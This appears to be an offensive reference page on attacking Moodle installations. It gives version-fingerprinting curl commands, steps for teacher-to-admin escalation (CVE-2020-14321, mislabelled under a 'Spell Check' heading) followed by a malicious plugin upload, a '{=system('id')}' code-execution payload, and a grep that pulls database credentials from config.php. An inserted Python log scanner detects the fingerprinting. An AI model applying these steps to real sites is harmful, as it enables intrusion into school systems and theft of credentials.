Moodle

What it is: Open-source learning management system (LMS) used by universities and schools. Found on educational targets. Admin accounts can execute PHP code through plugins and themes.

Default ports: 80, 443

Vuln research:


Identify Moodle version

Check specific paths and source code

curl -s http://$IP/ | grep -i "moodle"
curl -s http://$IP/lib/upgrade.txt | head -5
curl -s http://$IP/theme/upgrade.txt | head -5
# Admin login: /login/index.php
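
The same requests seen from the server side, as an added example that is not part of the original page: this Python script scans web-server access logs for clients that fetch the two upgrade.txt files above and records whether the file was actually served and whether a login POST followed. The log lines are constructed samples; the function name find_fingerprinting and the Apache/nginx "combined" log format are assumptions.

```python
import re
from collections import defaultdict

# Paths this page uses to fingerprint the Moodle version, plus the login page.
FINGERPRINT_PATHS = {"/lib/upgrade.txt", "/theme/upgrade.txt"}
LOGIN_PATH = "/login/index.php"

# Assumed Apache/nginx "combined" format: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

# Constructed sample log lines (documentation address ranges), not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2024:10:00:01 +0000] "GET / HTTP/1.1" 200 5120 "-" "curl/8.4.0"
203.0.113.7 - - [10/Mar/2024:10:00:02 +0000] "GET /lib/upgrade.txt HTTP/1.1" 200 9000 "-" "curl/8.4.0"
203.0.113.7 - - [10/Mar/2024:10:00:03 +0000] "GET /theme/upgrade.txt HTTP/1.1" 200 7000 "-" "curl/8.4.0"
203.0.113.7 - - [10/Mar/2024:10:00:09 +0000] "POST /login/index.php HTTP/1.1" 200 3100 "-" "curl/8.4.0"
198.51.100.20 - - [10/Mar/2024:10:01:00 +0000] "POST /login/index.php HTTP/1.1" 303 0 "-" "Mozilla/5.0"
198.51.100.20 - - [10/Mar/2024:10:01:01 +0000] "GET /my/ HTTP/1.1" 200 8000 "-" "Mozilla/5.0"
192.0.2.44 - - [10/Mar/2024:10:02:00 +0000] "GET /lib/upgrade.txt?x=1 HTTP/1.1" 403 199 "-" "Mozilla/5.0"
"""

def find_fingerprinting(log_text):
    """Return {client_ip: summary} for clients that requested a fingerprint path."""
    seen = defaultdict(lambda: {"paths": set(), "exposed": False, "login_after": False})
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the assumed format
        ip, path = m["ip"], m["path"].split("?", 1)[0]  # ignore query string
        if path in FINGERPRINT_PATHS:
            seen[ip]["paths"].add(path)
            # A 200 means the file was served, so version details were disclosed.
            seen[ip]["exposed"] |= m["status"] == "200"
        elif path == LOGIN_PATH and m["method"] == "POST" and seen[ip]["paths"]:
            # Login attempt from a client that fingerprinted the site earlier.
            seen[ip]["login_after"] = True
    # Drop clients that never touched a fingerprint path.
    return {ip: s for ip, s in seen.items() if s["paths"]}

if __name__ == "__main__":
    for ip, s in find_fingerprinting(SAMPLE_LOG).items():
        print(ip, sorted(s["paths"]), "exposed" if s["exposed"] else "blocked",
              "login attempt followed" if s["login_after"] else "")
```

A client reported as "exposed" received the file with a 200; denying web access to the upgrade.txt files at the web server turns those into "blocked" entries.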

Moodle RCE via Spell Check (CVE-2020-14321)

Teacher role escalation to admin → RCE — Moodle < 3.9

# Requires teacher account
# Enrol yourself as manager in a course → gain admin
# Then: Site Administration → Plugins → Install plugins → Upload malicious plugin ZIP

Moodle RCE via calculated questions

If you have teacher or admin access — PHP code execution

# Quiz → Add Question → Calculated
# In answer formula: {=system('id')}
# Or use the Tex filter if enabled for command execution

Moodle config.php

Database credentials in plaintext

grep -E "(dbhost|dbname|dbuser|dbpass)" /var/www/html/moodle/config.php

Example output:
$CFG->dbhost    = 'localhost';
$CFG->dbname    = 'moodle';
$CFG->dbuser    = 'moodle_admin';
$CFG->dbpass    = 'M00dle_Pass!';